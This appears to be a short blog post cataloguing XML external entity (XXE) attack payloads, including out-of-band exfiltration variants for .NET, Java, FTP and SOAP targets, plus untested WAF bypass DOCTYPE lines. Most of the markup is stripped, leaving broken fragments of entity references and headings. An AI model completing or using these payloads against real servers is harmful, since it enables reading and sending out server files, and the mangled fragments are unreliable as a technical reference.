XXE Payload

]>
&sp;

OoB extraction

%sp;
%param1;
]>
&exfil;
## External dtd: ##

">

OoB variation of above (seems to work better against .NET)

%sp;
%param1;
%exfil;
]>
## External dtd: ##

">

OoB extraction

%sp;
%param3;
%exfil;
]>
## External dtd: ##
">

OoB extra ERROR -- Java

%sp;
%param3;
%exfil;
]>

## External dtd: ##
'> %param1; %external;

OoB extra nice

">

%dtd;
]>
&all;
## External dtd: ##

File-not-found exception based extraction

%one;
%two;
%four;
]>
## External dtd: ##

">

FTP

%asd;
%c;
]>
&rrr;
## External dtd ##

">

Inside SOAP body

soap:Body

%dtd;]>]]>

</soap:Body>
---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :-: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

posted @ 2019-04-24 17:49 Qusss 阅读(233) 评论(0) 收藏举报

刷新页面返回顶部

Qusss

XXE Payload

公告